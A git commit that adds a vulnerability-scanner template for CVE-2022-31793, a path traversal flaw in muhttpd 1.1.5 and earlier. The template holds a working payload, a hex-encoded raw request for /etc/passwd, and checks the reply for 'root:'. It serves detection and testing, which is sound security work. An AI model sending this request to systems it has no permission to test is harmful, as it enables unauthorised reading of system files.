Create CVE-2022-31793.yaml

2022-07-31 20:26:56 +09:00 · 2022-07-31 20:26:56 +09:00 · c56784a036
parent 04a611fea0
commit c56784a036
1 changed files with 33 additions and 0 deletions
--- a/cves/2022/CVE-2022-31793.yaml
+++ b/cves/2022/CVE-2022-31793.yaml
@ -0,0 +1,33 @@
+id: CVE-2022-31793
+
+info:
+  name: muhttpd <= 1.1.5 - Path traversal
+  author: scent2d
+  severity: 
+  description: |
+    A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
+  reference:
+    - https://derekabdine.com/blog/2022-arris-advisory.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: CVE-2022-31793
+    cwe-id: 
+  tags: cve,cve2022,muhttpd,lfi,unauthenticated
+
+network:
+  - host:
+    - "{{Hostname}}"
+    inputs:
+      - data: "47455420612F6574632F706173737764" # GET a/etc/passwd
+        type: hex
+      - data: "\n\n"
+
+    read-size: 128
+    matchers:
+      - type: word
+        encoding: hex
+        words:
+          - "726f6f743a" # root:
+        part: body